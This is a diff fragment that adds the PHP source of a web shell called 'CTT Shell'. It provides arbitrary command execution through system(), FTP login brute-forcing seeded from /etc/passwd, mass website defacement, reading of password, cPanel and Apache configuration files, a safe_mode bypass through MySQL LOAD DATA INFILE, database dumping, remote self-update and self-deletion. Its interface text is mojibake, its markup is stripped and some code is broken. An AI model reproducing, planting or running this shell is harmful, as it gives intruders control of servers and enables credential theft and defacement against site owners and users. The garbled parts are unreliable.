+chdir($curdir);
+
+if (($selfwrite) or ($updatenow))
+{
+ if ($selfwrite == "1") {$selfwrite = "ctshell.php";}
+ ctsh_getupdate();
+ $data = file_get_contents($ctsh_updatefurl);
+ $fp = fopen($data,"w");
+ fwrite($fp,$data);
+ fclose($fp);
+ exit;
+}
+if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
+if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
+else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+$sess_data["copy"] = array_unique($sess_data["copy"]);
+$sess_data["cut"] = array_unique($sess_data["cut"]);
+
+if (!function_exists("ct_sess_put"))
+{
+function ct_sess_put($data)
+{
+ global $sess_method;
+ global $sess_cookie;
+ global $sess_file;
+ global $sess_data;
+ $sess_data = $data;
+ $data = serialize($data);
+ if ($sess_method == "file")
+ {
+  $fp = fopen($sess_file,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+ }
+ else {setcookie($sess_cookie,$data);}
+}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len) 
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0, $len)."...".substr($content, -$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
+if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (!is_dir($t)) {mkdir($t);}
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+
+  return copy($d,$t);
+ }
+ else {return false;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ error_reporting(9999);
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+$ret = true;
+if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
+if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d)) {return rename($d,$t);}
+ else {return false;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+if (!is_dir($d.$o)) {unlink($d.$o);}
+else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\","/",$o);
+ if (is_dir($o))
+ {
+  if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return false;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+ function myshellexec($cmd)
+ {
+  return system($cmd);
+ }
+}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner['read'] = ($mode & 00400) ? "r" : "-"; 
+ $owner['write'] = ($mode & 00200) ? "w" : "-"; 
+ $owner['execute'] = ($mode & 00100) ? "x" : "-"; 
+ $group['read'] = ($mode & 00040) ? "r" : "-"; 
+ $group['write'] = ($mode & 00020) ? "w" : "-"; 
+ $group['execute'] = ($mode & 00010) ? "x" : "-"; 
+ $world['read'] = ($mode & 00004) ? "r" : "-"; 
+ $world['write'] = ($mode & 00002) ? "w" : "-"; 
+ $world['execute'] = ($mode & 00001) ? "x" : "-"; 
+
+ if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";}
+ 
+ return $type.$owner['read'].$owner['write'].$owner['execute'].
+  $group['read'].$group['write'].$group['execute'].
+  $world['read'].$world['write'].$world['execute'];
+}
+}
+if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
+if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
+if (!function_exists("ctsh_getupdate"))
+{
+function ctsh_getupdate()
+{
+ global $updatenow;
+ $data = @file_get_contents($ctsh_updatefurl);
+ if (!$data) {echo "Can't fetch update-information!";}
+ else
+ {
+  $data = unserialize(base64_decode($data));
+  if (!is_array($data)) {echo "Corrupted update-information!";}
+  else
+  {
+if ($cv < $data[cur]) {$updatenow = true;}
+  }
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = true;}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (empty($file))
+ {
+  global $win;
+  if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+  else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (sizeof($tabs) == 0)
+ {
+
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ global $SERVER_ADDR;
+ global $SERVER_NAME;
+ $out = "# Dumped by ctShell.SQL v. ".$cv."
+# Home page: http://.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
+# Date: ".date("d.m.Y H:i:s")."
+# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+if (!$res) {$ret[err][] = mysql_error();}
+else
+{
+ $row = mysql_fetch_row($res);
+ $out .= $row[1].";\n\n";
+ $res = mysql_query("SELECT * FROM `$tab`", $sock);
+ if (mysql_num_rows($res) > 0)
+ {
+  while ($row = mysql_fetch_assoc($res))
+  {
+$keys = implode("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+$values = implode("', '", $values); 
+$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+$out .= $sql;
+  } 
+ }
+}
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret[err][] = 2;}
+  else
+  {
+fwrite ($fp, $out);
+fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $ret;
+}
+}
+if (!function_exists("ctfsearch"))
+{
+function ctfsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $a;
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $handle = opendir($d);
+ while ($f = readdir($handle))
+ {
+  $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
+  if($f != "." && $f != "..")
+  {
+if (is_dir($d.$f))
+{
+ if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
+ ctfsearch($d.$f);
+}
+else
+{
+ if ($true)
+ {
+  if (!empty($a[text]))
+  {
+$r = @file_get_contents($d.$f);
+if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
+if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}
+ 
+if ($a[text_regexp]) {$true = ereg($a[text],$r);}
+else {$true = strinstr($a[text],$r);}
+if ($a[text_not])
+{
+ if ($true) {$true = false;}
+ else {$true = true;}
+}
+if ($true) {$found[] = $d.$f; $found_f++;}
+  }
+  else {$found[] = $d.$f; $found_f++;}
+ }
+}
+  }
+ }
+ closedir($handle);
+}
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+
+global $SERVER_SOFTWARE;
+if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
+else {$win = 0;}
+
+if (empty($tmpdir))
+{
+ if (!$win) {$tmpdir = "/tmp/";}
+ else {$tmpdir = $_ENV[SystemRoot];}
+}
+$tmpdir = str_replace("\\","/",$tmpdir);
+if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "ON (secure)";
+}
+else {$safemode = false; $hsafemode = "OFF (not secure)";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on")
+{
+ $openbasedir = true;
+ $hopenbasedir = "".$v."";
+}
+else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";}
+
+$sort = htmlspecialchars($sort);
+
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"    PHP/".phpversion()."",$SERVER_SOFTWARE);
+
+@ini_set("highlight.bg",$highlight_bg); 
+@ini_set("highlight.comment",$highlight_comment);
+@ini_set("highlight.default",$highlight_default);
+@ini_set("highlight.html",$highlight_html); 
+@ini_set("highlight.keyword",$highlight_keyword); 
+@ini_set("highlight.string","#DD0000"); 
+
+if ($act != "img")
+{
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?>
+
+
+
+
+CTT Shell -=[ <? echo $HTTP_HOST; ?> ]=- 
+
+ 
+
+
+
    
+
    
+ 
+ 
+ 
+
+
     
+ 
+ 
+ 
+ 
+ 
+ 
+
      
+
+".htmlspecialchars($b)."/";
+ $i++;
+}
+?>
+
    
+
+
    
+Èíñòğóìåíòû - 
+ 
+Èíôîğìàòîğ
+
+
+ - Äèñêè
+
+ 
+
+About
+
    
+
+
    
+
    
+ 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "".$item[0]."    ";
+ }
+}
+?>
+
    
+
    
+
+

    
+
+
    ";
+ if (!$sql_sock) {?>
+
    Ìåíåäæåğ SQL:
    ";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "ÍÅÒ ÑÂßÇÈ";}
+  else {echo "
    Can't connect
    "; echo "".$err."";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
+  else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
+  $sqlquicklaunch[] = array("Server-status",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$sul."act=sql");
+ 
+  echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    ";
+
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}
+  echo "
    ";
+ }
+ echo "
     
     
    
+
  • Åñëè ëîãèí ÿâëÿåòñÿ ïóñòûì, ëîãèí - âëàäåëåö ïğîöåññà. 
    • 
+
  • Åñëè õîçÿèí ÿâëÿåòñÿ ïóñòûì, õîçÿèí - localhost 
    • 
+
  • Åñëè ïîğò ÿâëÿåòñÿ ïóñòûì, ïîğò - 3306 (íåïëàòåæ)
    		• 
+
+
     Çàïîëíèòå ôîğìó:
+
+
+
+
+
    Èìÿ:Ïàğîëü:
    
+
    Õîñò:Ïîğò:
    		">Home
    ".htmlspecialchars($sql_db)." ]---
    ";
+ $c = 0;
+ while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
    
+"; mysql_free_result($count); $c++;}
+ if (!$c) {echo "No tables found in database.";}
+}
+  }
+  else
+  {
+?>    		Home
    Ïîæàëóéñòà, âûáåğèòå áàçó äàííûõ
    		";
+  if ($sql_db)
+  {
+echo "
    There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").
    ";
+if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}
+echo "
    ";
+
+$acts = array("","dump");
+
+if ($sql_act == "query")
+{
+ echo "
    ";
+ if ($submit)
+ {
+  if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error: 
    ".$sql_query_error."
    ";}
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to  :";} else {echo "SQL-Query :";} echo "



     
    ";}
+}
+if (in_array($sql_act,$acts))
+{
+ ?>
    Create new table:
     
    		SQL-Dump DB:
    "> 
    ";}
+ if ($sql_act == "newtpl")
+ {
+  echo "";
+  if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";
+ }
+ else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_error();}
+}
+elseif ($sql_act == "dump")
+{
+ $set = array();
+ $set["sock"] = $sql_sock;
+ $set["db"] = $sql_db;
+ $dump_out = "print";
+ if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
+ elseif ($dump_out == "download")
+ {
+  @ob_clean();
+  header("Content-type: ctshell");
+  header("Content-disposition: attachment; filename=\"".$f."\";"); 
+  $set["print"] = 1;
+  $set["nl2br"] = 1;
+ }
+ $set["file"] = $dump_file;
+ $set["add_drop"] = true;
+ $ret = mysql_dump($set);
+ if ($dump_out == "download") {exit;}
+}
+else
+{
+ $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); 
+ echo "
    ";
+ echo "";
+ echo "";
+ echo "";
+ echo "";
+ echo "";
+ echo "";
+ echo "";
+ echo "";
+ echo "";
+ echo "";
+ $i = 0;
+ $tsize = $trows = 0;
+ while ($row = mysql_fetch_array($result, MYSQL_NUM))
+ {
+  $tsize += $row["5"];
+  $trows += $row["5"];
+  $size = view_size($row["5"]);
+  echo "";
+  echo "";
+  echo "";
+  echo "";
+  echo "";
+  echo "";
+  echo "";
+  echo "";
+  echo "";
+  echo "";
+  $i++;
+ }
+ echo "";
+ echo "";
+ echo "";
+ echo "";
+ echo "";
+ echo "";
+ echo "";
+ echo "";
+ echo "";
+ echo "";
+ echo "
    Table
    		RowsTypeCreatedModifiedSizeAction
     ".$row[0]." ".$row[3]."".$row[1]."".$row[10]."".$row[11]."".$size."
+ 
+
    »
    ".$i." table(s)
    		".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."
     
    ";
+ mysql_free_result($result);
+}
+  }
+  }
+  else
+  {
+$acts = array("","newdb","serverstat","servervars","processes","getfile");
+if (in_array($sql_act,$acts))
+{
+ ?>
    Ñîçäàéòå íîâûé Áàçó:
     
    		Ïğèñìîòğåòü Ôàéëà:
     
    ";
+ if ($sql_act == "newdb")
+ {
+  echo "";
+  if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";}
+  else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_error();}
+ }
+ if ($sql_act == "serverstatus")
+ {
+  $result = mysql_query("SHOW STATUS", $sql_sock); 
+  echo "
    Server-status variables:

    ";
+  echo "";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} 
+  echo "
    Namevalue
    ".$row[0]."".$row[1]."
    ";
+  mysql_free_result($result);
+ }
+ if ($sql_act == "servervars")
+ {
+  $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+  echo "
    Server variables:

    ";
+  echo "";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} 
+  echo "
    Namevalue
    ".$row[0]."".$row[1]."
    ";
+  mysql_free_result($result);
+ }
+ if ($sql_act == "processes")
+ {
+  if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";}
+  $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+  echo "
    Ïğîöåññû:

    ";
+  echo "";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";}
+  echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    ";
+  mysql_free_result($result);
+ }
+ elseif (($sql_act == "getfile"))
+ {
+  if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
+  elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
+  elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
+  else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
+  else
+  {
+for ($i=0;$i$col_value) {$f .= $col_value;}}
+if (empty($f)) {echo "File \"".$sql_getfile."\" does not exists or empty!";}
+else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f));}
+  }
+  mysql_free_result($result);
+  if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
+  }
+ }
+}
+  }
+ }
+ echo "
    ";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d) {if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";}}
+ echo "

    ";
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "Ftp Quick brute:
    ";
+ if ($win) {echo "This functions not work in Windows!

    ";}
+ else
+ {
+  function ctftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+if ($fqb_onlywithsh)
+{
+ if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;}
+ else {$true = true;}
+}
+else {$true = true;}
+if ($true)
+{
+ $sock = @ftp_connect($host,$port,$timeout);
+ if (@ftp_login($sock,$login,$pass))
+ {
+  echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    ";
+  ob_flush();
+  return true;
+ }
+}
+  }
+  if (!empty($submit))
+  {
+if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+$fp = fopen("/etc/passwd","r");
+if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+else
+{
+ ob_flush();
+ $i = $success = 0;
+ $ftpquick_st = getmicrotime();
+ while(!feof($fp))
+ { 
+  $str = explode(":",fgets($fp,2048));
+  if (ctftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+  {
+$success++;
+  }
+  if ($i > $fqb_lenght) {break;}
+  $i++;
+ } 
+ if ($success == 0) {echo "No success. connections!";}
+ $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+ echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
    ";
+}
+  }
+  else {echo "

    Read first: 

    Users only with shell? 

    ";}
+ }
+}
+if ($act == "lsa")
+{
+ echo "
    Èíôîğìàöèÿ áåçîïàñíîñòè ñåğâåğà:
    ";
+ echo "Ïğîãğàììíîå îáåñïå÷åíèå: ".PHP_OS.", ".$SERVER_SOFTWARE."
    ";
+ echo "Áåçîïàñíîñòü: ".$hsafemode."
    ";
+ echo "Îòêğûòûé îñíîâíîé äèğåêòîğ: ".$hopenbasedir."
    ";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+if ($nixpasswd == 1) {$nixpasswd = 0;}
+$num = $nixpasswd + $nixpwdperpage;
+echo "*nix /etc/passwd:
    ";
+$i = $nixpasswd;
+while ($i < $num)
+{
+ $uid = posix_getpwuid($i);
+ if ($uid) {echo join(":",$uid)."
    ";}
+ $i++;
+}
+  }
+  else {echo "
    Get /etc/passwd
    ";}
+  if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";}
+  if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.") 
    ";}
+  else {echo "Âû ìîæåòå âçëîìàòü winnt ïàğîëè. Ñêà÷àòü, c èñïîëüçîâàíèå lcp.crack+.
    ";}
+ }
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "
    Buffer is empty!
    ";}
+ else
+ {
+  echo "File-System buffer

    ";
+  $ls_arr = $arr;
+  $disp_fullpath = true;
+  $act = "ls";
+ }
+}
+if ($act == "selfremove")
+{
+ if (!empty($submit))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ctshell v.".$cv."!"; exit; }
+  else {echo "
    Can't delete ".__FILE__."!
    ";}
+ }
+ else
+ {
+  $v = array();
+  for($i=0;$i<8;$i++) {$v[] = "NO";}
+  $v[] = "YES";
+  shuffle($v);
+  $v = join("   ",$v);
+  echo "Ñàìîóäàëèòü: ".__FILE__." 
    Âû óâåğåííû?
    ".$v."
    ";
+ }
+}
+if ($act == "massdeface")
+{
+ if (empty($deface_in)) {$deface_in = $d;}
+ if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
+ if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+
+  $text = $deface_text;
+  $text_regexp = $deface_text_regexp;
+  if (empty($text)) {$text = " "; $text_regexp = 1;}
+
+  $a = array
+  (
+"name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
+"text"=>$text, "text_regexp"=>$text_regxp,
+"text_wwo"=>$deface_text_wwo,
+"text_cs"=>$deface_text_cs,
+"text_not"=>$deface_text_not
+  );
+  $defacetime = getmicrotime();
+  $in = array_unique(explode(";",$deface_in));
+  foreach($in as $v) {ctfsearch($v);}
+  $defacetime = round(getmicrotime()-$defacetime,4);
+  if (count($found) == 0) {echo "No files found!";}
+  else
+  {
+$ls_arr = $found;
+$disp_fullpath = true;
+$act = $dspact = "ls";
+  }
+ }
+ else
+ {
+  if (empty($deface_preview)) {$deface_preview = 1;}
+
+ }
+ echo "
    ";
+ if (!$submit) {echo "Attention! It's a very dangerous feature, you may lost your data.

    ";}
+ echo "
+Deface for (file/directory name):   - regexp
+
    Deface in (explode \";\"): 
+

    Search text:
    
+

     - regexp
+   - whole words only
+   - case sensitive
+   - find files NOT containing the text
+
     - PREVIEW AFFECTED FILES
+

    Html of deface:
    
+

    ";
+ if ($act == "ls") {echo "
    Deface took ".$defacetime." secs

    ";}
+}
+if ($act == "search")
+{
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $a = array
+  (
+"name"=>$search_name, "name_regexp"=>$search_name_regexp,
+"text"=>$search_text, "text_regexp"=>$search_text_regxp,
+"text_wwo"=>$search_text_wwo,
+"text_cs"=>$search_text_cs,
+"text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v)
+  {
+ctfsearch($v);
+  }
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "No files found!";}
+  else
+  {
+$ls_arr = $found;
+$disp_fullpath = true;
+$act = $dspact = "ls";
+  }
+ }
+ echo "
    
+
+Search for (file/directory name):   - regexp
+
    Search in (explode \";\"): 
+

    Text:
    
+

     - regexp
+   - whole words only
+   - case sensitive
+   - find files NOT containing the text
+

    ";
+ if ($act == "ls") {echo "
    Search took ".$searchtime." secs

    ";}
+}
+if ($act == "chmod")
+{
+ $perms = fileperms($d.$f);
+ if (!$perms) {echo "Can't get current mode.";}
+ elseif ($submit)
+ {
